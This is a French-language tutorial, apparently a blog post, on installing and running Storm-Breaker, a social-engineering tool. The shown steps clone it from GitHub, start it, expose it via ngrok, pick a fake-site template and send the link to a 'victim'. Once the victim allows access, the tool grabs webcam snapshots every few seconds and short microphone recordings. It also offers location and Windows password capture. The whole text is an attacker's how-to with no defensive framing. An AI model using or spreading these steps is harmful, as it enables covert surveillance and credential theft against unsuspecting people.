Aller au contenu

Storm-Breaker

Storm-Breaker est un programme d’ingénierie sociale qui permet de prendre contrôle de la webcam et ou du micro du device de la victime. Les caméras de smartphones ou de tablette sont également prises en compte.

Installation de Storm-Breaker

1. Télécharger Storm-Breaker via git :
2. Se placer dans le répertoire de Storm-Breaker
3. Lancer le install.sh
4. Installer les prérequis python  
git clone https://github.com/ultrasecurity/Storm-Breaker
cd Storm-Breaker
bash install.sh
python3 -m pip install -r requirements.txt
5. Lancer le programme avec cette commande : 
python3 st.py
On arrive sur la page d’accueil du programme 
 (               )   (       *                (                     )       (
 )\ )  *   )  ( /(   )\ )  (  `           (   )\ )       (       ( /(       )\ )
(()/(` )  /(  )\()) (()/(  )\))(        ( )\ (()/( (     )\      )\()) (   (()/(
/(_))( )(_))((_)\   /(_)_)()\       ___  )((_) /(_)))\ ((((_)(  |((_)\  )\   /(_))
 (_)) (_(_())   ((_) (_))  (_()((_)|___|((_)_ (_)) ((_) )\ _ )\ |_ ((_)((_) (_))
/ __||_   _|  / _ \ | _ \ |  \/  |      | _ )| _ \| __|(_)_\(_)| |/ / | __|| _ \
\__ \  | |   | (_) ||   / | |\/| |      | _ \|   /| _|  / _ \    ' <  | _| |   /
|___/  |_|    \___/ |_|_\ |_|  |_|      |___/|_|_\|___|/_/ \_\  _|\_\ |___||_|_\

 [+] Web Panel Link : http://localhost:2525

 [+] Please Run NGROK On Port 2525 AND Send Link To Target > ngrok http 2525

 If You Want Exit And Turn Off localhost / press enter or CTRL+C
Capture décran 2021 11 03 à 16.01.10
Ici il y’a plusieurs options, on peut choisir de créer un lien pour avoir accès à la webcam, au micro, au mots de passe Windows 10 ou encore à l’emplacement géographique pour les smartphones.

Utilisation de Storm-Breaker

1. Lancer le programme et choisir une option, je vais prendre webcam pour l’exemple. Ensuite on nous demande de choisir un template pour l’apparence du faux site, je choisis celui par défaut
Capture décran 2021 11 03 à 16.04.50
2. Il suffit en suite de copier et d’envoyer le lien ngrok.io que le programme nous donne
Capture décran 2021 11 03 à 16.08.05
3. Voici à quoi ressemble le piège
Capture décran 2021 11 03 à 16.09.07
4. Une fois que la victime à cliqué sur Autoriser, le système va prendre des instantanés de la webcam toutes les 2 ou 3 secondes et les enregistrer dans un dossier. Si on à choisi l’option microphone, le programme fait des courts enregistrements et les enregistre également dans un dossier.
Voici à quoi ressemble l’écran du programme pendant l’attaque : 
Capture décran 2021 11 03 à 16.14.51
Et voici le dossier webcam du programme.
Capture décran 2021 11 03 à 16.20.56